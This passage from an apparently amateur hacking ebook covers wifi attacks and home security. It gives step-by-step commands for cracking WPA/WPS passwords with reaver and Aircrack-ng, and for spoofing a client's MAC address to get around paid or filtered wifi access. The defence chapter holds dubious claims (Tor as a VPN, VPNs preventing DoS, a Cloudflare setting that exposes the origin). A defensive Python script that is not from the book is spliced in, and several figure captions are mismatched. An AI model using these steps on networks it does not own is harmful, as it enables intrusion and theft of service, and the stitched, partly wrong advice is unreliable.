4. Type airodump-ng mon0 to see the networks. I will use the dlink because it's mine (see Figure 8-4).

Figure 8-4. Here it's scanning the wifi in the area just like before.

Press Ctrl+C to stop the process when you see the network you want to use.

5. Now go to the second terminal and install reaver. First we will get an update, so we type in:

    apt-get update

6. And now we install reaver by typing:

    apt-get install reaver

7. And now we type in to start using reaver:

    reaver -i mon0 -b 70:19:70:5A:63:26 -vv

8. Now let it run. It could take 2 to 10 hours, and after that, when it gets cracked, you'll get this (see Figure 8-5). And we found the password in WPA PSK: nnoosecretts

Figure 8-5. After a while of scanning, here it found the password I was looking for.

Crack Wi-Fi passwords in Windows

Linux is not the only operating system that is able to hack wireless passwords. Windows also uses aircrack-ng to accomplish wifi password hacking. Some people find it easier to use Windows because of the graphical user interface, so I made an exercise that teaches it.

1. First download the free trial version of CommView at http://www.tamos.com/download/main/ca.php

It can also be bought from the site itself. This is a tool for monitoring wireless.

2. Once it's done, launch CommView (see Figure 8-5) and go to the Note tab.

Figure 8-5. Shows you CommView opened, ready to start doing some sniffing.

3. Click the blue Start button. This will open the scanner dialog, and in there click Start Scanning.

4. Let it scan until you find the network you want to attack. If you still can't find the network you may want to change the channel (see Figure 8-6). And when you have found it, stop the scanning and click on Capture.

Figure 8-6. There are the wifis in the area being scanned.

5. WPA hacking is different from WEP hacking. For WPA a handshake needs to be captured; with that being said, I recommend leaving the scanner running to increase the chance of capturing a handshake.

6. When you think you have enough, stop the capturing, go to the Logging tab, click on Concatenate Logs and save it with any file name on the Desktop (see Figure 8-7).

Figure 8-7. Here is how your settings need to look when you're about to save your log file.

7. Now go to File->Log Viewer. Once the dialog opens go to File->Load CommView Logs... and from there load the file you just saved.

8. Go to File->Export Logs->Wireshark/Tcpdump Format, give it a name and save.

9. Now we go to www.aircrack-ng.org/install.html, click on Pre-compiled and from there download Aircrack-ng GUI.exe (see Figure 8-8).

Figure 8-8. This is the Aircrack-ng GUI running, ready to crack the file.

10. Change the encryption to WPA and click Choose in the Wordlist field; browse to where you want to save the password list in a text file, for example passwordlist.txt. Then click Launch.

11. This will open a command prompt with all the networks listed, and in the encryption column you will see whether it has a handshake or not (see Figure 8-9).

Figure 8-9. Here is how it looks when you have to select the MAC address of the wifi you hacked.

Choose the index number to target the network; in my case I chose: 5

12. Aircrack will start searching the possible passwords, and when it finds the password it will stop running and give you the key found (see Figure 8-10).

Figure 8-10. Here is how it looks when it has found the password.

And that's how you find a wifi password in Windows. Fairly easy, just by using a graphical user interface.

Bypassing MAC Address filters

Sometimes you might have the password for the wifi in the area, but you're not in the MAC address list. For example, you might have to pay the front desk to get complete access to the wifi to gain internet. Here I will show you how to bypass the MAC address filter.

1. Run BackTrack to the desktop and run the terminal.

2. Now type:

    airmon-ng start wlan0

    airodump-ng mon0

3. Copy the BSSID of the network we want to hack. Mine is: 98:FC:11:69:E6:07

4. Now we will search for some packets from the wifi. We will use airodump-ng -c [channel] -a --bssid [bssid] mon0. That means I would type:

    airodump-ng -c 9 -a --bssid 98:FC:11:69:E6:07 mon0

5. Now we wait for the terminal to work until we get some packets under STATION (see Figure 8-11).

Figure 8-11. Here is how it looks when it has found the password.

6. Once you have found the MAC address under the station, copy it. Mine is 00:12:3E:78:3F:7F

7. Now we take the interface down, set the new MAC address and bring it back up by typing:

    ifconfig wlan0 down

    macchanger -m 00:12:3E:78:3F:7F wlan0

    ifconfig wlan0 up

8. Now launch the wireless manager by going to Start->Internet->Wicd Network Manager.

9. Disconnect all, give it a refresh and connect to the wifi whose filter you bypassed, and it should work.

Sometimes if you bypass the MAC filter you might lose the internet. It might be because they found out that you spoofed inside the network and kicked you out.

Small summary ahead

*WEP encryption is the most vulnerable encryption for wifi.

*WPA2 encryption is the strongest encryption for wifi.

*CommView and an airmon-ng compatible wifi adapter are the requirements for wifi hacking.

*If the adapter is not strong enough you won't be able to get enough packets to do the hacking.

*MAC address filtering can be bypassed using BackTrack.


Chapter 9 Defending from Hackers

We will cover:

*Protect yourself against DoS attacks

*Best tool to remove the virus

*Securing your operating system

*Securing your wireless

Being a hacker, it would be very sad to get hacked by another hacker, and even if you're not a hacker, it's inappropriate to get hacked by someone else. So here I gathered a few methods that will help you protect yourself from black hat hackers.

Protect yourself against DoS attacks

DoS cannot be blocked by firewalls, anti-virus or any of those softwares. It's almost inevitable, but there are still some softwares and ways to prevent DoS from happening. In this exercise I will demonstrate to you how to prevent them.

Protecting the network

Using a VPN or using proxies is the best way to protect your router and network from getting DoSed. Because when the attacker starts flooding your IP, what he is actually doing is flooding the wrong IP (the faked IP), and with that he/she won't get the chance to reach your computer or router.

Here are the free VPN softwares available:

*Hotspot Shield

*Hola Unblocker

*Expat Shield

*HideMyAss

Protecting the site

Websites are the main target for attacking in terms of DoS. In most cases if the attacker manages to get a stack of computers he might be able to drop the site down. Here I will show you what to use so that even with a million computers pinging your site it would be impossible to crash your site.

1. Go to cloudflare.com and register a free account (see Figure 9-1).

Figure 9-1. Shows you how Cloudflare looks when you're in.

2. When you're in your account you can have multiple sites set up in your account.

3. Now once your website is set up, go to your website's DNS settings and leave the direct connect ON.

4. Also make sure at the top everything is going through Cloudflare, so leave them ON.

Best tool to remove the virus

I won't be talking about which are the best antivirus softwares to use. Most of them are good and they do the job right, but it's not always that an antivirus can delete it properly or even detect it. Here I will be showing you the best 9.8 megabyte tool that ever existed to clean the PC. We will be using Malwarebytes for this task, so follow it closely.

1. Go to malwarebytes.org/downloads/ and download it for free (see Figure 9-2).

Figure 9-2. Shows you how Malwarebytes looks once you're in.

This software has worked better than all the 25 antivirus programs I've tested in the past few years. So get yours right now.

2. Navigate a bit in the tabs.

3. Once you have installed it, launch it. Choose Perform Quick Scan and then click Scan to test the software's power. Maybe before you even click on Scan, Malwarebytes has already started to quarantine a few malicious threats.

4. Once you have scanned and deleted the viruses in the memory and on the HDD, it's time to view the logs to see when and where the virus was created (see Figure 9-3).

Figure 9-3. Shows you how the log file looks when you open it.

Securing your operating system

Having no virus on the OS is just not enough. There are sophisticated programs created by hackers to penetrate your computer (social engineering) and break your privacy. I'll be showing you two tools that I use every day to protect myself from those people.

1. First go to www.zonealarm.com and download the free version of ZoneAlarm.

2. Once you're done installing it, launch it. What this program does: every program or virus that tries to use the network or the internet needs to get passed through ZoneAlarm. This really prevents hackers from entering your computer remotely.

3. After a few days, when you have blocked many programs that weren't supposed to use the internet, you can view them in the Firewall tab -> amount of programs secured (see Figure 9-4).

Figure 9-4. This is ZoneAlarm showing how it blocked all the programs you selected from using the internet or network.

4. Another great tool to completely protect yourself is the use of Avast SafeZone. First of all download or buy the full version of Avast. When you have installed it go to the SECURITY TAB->Tools Section->SafeZone and click on Switch to SafeZone (see Figure 9-5).

Figure 9-5. Here in Avast you can activate the SafeZone to go secure.

When you're inside the SafeZone, no Windows program affects the zone. And once you're inside SafeZone you can do online banking even more securely, using the browser it comes with.

Securing your wireless

We already discussed how to hack a wifi and the encryption types, but here we will be showing you how to secure it. To secure your wireless connection you can do it by using the WPA2 encryption, which really lets you use letters and numbers, and with that you can create a very strong password.

First off we will start securing the router.

1. Open cmd and type in:

    ipconfig /all

2. From there locate the line that is labeled Gateway.

3. Paste that Gateway IP into your favorite web browser's address bar.

4. If you are using the Linksys, go to the Wireless Security tab and change the Security Mode to WPA or WPA2.

5. Also disable Remote Administration and enable the router firewall.

6. When you're done, also change the administration password.
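As an added defender's check (not from the book), the script below applies the chapter's ranking of wifi encryption (WEP weakest, WPA2 strongest) to saved output of the Windows command `netsh wlan show networks mode=bssid`, so an administrator can list routers that are still on WEP or open authentication and need the WPA2 change described above. The netsh command and its output layout are real; the sample output, SSIDs and BSSIDs are constructed for this example.

```python
import re

# Constructed sample of `netsh wlan show networks mode=bssid` output; made-up SSIDs/BSSIDs.
SAMPLE_NETSH = """\
SSID 1 : HomeRouter
    Network type            : Infrastructure
    Authentication          : WPA2-Personal
    Encryption              : CCMP
    BSSID 1                 : 02:00:00:aa:bb:01

SSID 2 : OldRouter
    Authentication          : Open
    Encryption              : WEP
    BSSID 1                 : 02:00:00:aa:bb:02

SSID 3 : Lobby
    Authentication          : Open
    Encryption              : None
"""

# Weakest first, following the chapter's ranking (WEP weakest, WPA2 strongest).
RANK = {"open": 0, "wep": 1, "wpa": 2, "wpa2": 3, "wpa3": 4}

def parse_networks(text):
    """Group netsh output into one dict per SSID with its auth and encryption."""
    nets, cur = [], None
    for line in text.splitlines():
        ssid = re.match(r"\s*SSID \d+ : (.*)", line)  # anchored, so 'BSSID' lines do not match
        if ssid:
            cur = {"ssid": ssid.group(1).strip(), "auth": "", "enc": ""}
            nets.append(cur)
            continue
        field = re.match(r"\s*(Authentication|Encryption)\s*: (.*)", line)
        if field and cur is not None:
            cur["auth" if field.group(1) == "Authentication" else "enc"] = field.group(2).strip()
    return nets

def rate(net):
    """Map netsh's auth/encryption strings onto the chapter's scale."""
    auth, enc = net["auth"].lower(), net["enc"].lower()
    for level in ("wpa3", "wpa2", "wpa"):  # most specific name first
        if level in auth:
            return level
    return "wep" if enc == "wep" else "open"  # 'Open' auth with WEP encryption is WEP

def weak_networks(text, minimum="wpa2"):
    """Return (ssid, rating) for every network configured below `minimum`."""
    return [(n["ssid"], rate(n)) for n in parse_networks(text) if RANK[rate(n)] < RANK[minimum]]
```

On a real machine, save `netsh wlan show networks mode=bssid > nets.txt` and pass the file's contents to `weak_networks`; every SSID it returns should be reconfigured to WPA2 in the router's Wireless Security tab.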

Small summary ahead

*DoS can be prevented by using VPN softwares like Tor.

*Website DoS can be prevented by using CloudFlare.

*The best antivirus in my opinion is Malwarebytes.

*ZoneAlarm and Avast SafeZone are really decent for computer security.

*Securing the wifi happens in the router administrator settings.


Sad to say Farewell!

That was all folks! I really tried not to talk a lot in the chapters and only give the meat as much as possible. Hope you did learn one thing or two about computer penetration. Hacking is really cool stuff; it simply makes you a more important person than you already are, if you know what I mean.

If this book goes well I'll write an even more advanced book that goes more in depth with the hacking subject, such as XSS and Kali. Remember to use this power you now gained for justice. Peace.

If you enjoyed learning about this book you may be interested in this book's original format, which is in paperback.

Paperback link

Also if you found this book great, please leave a good review on the sales page.
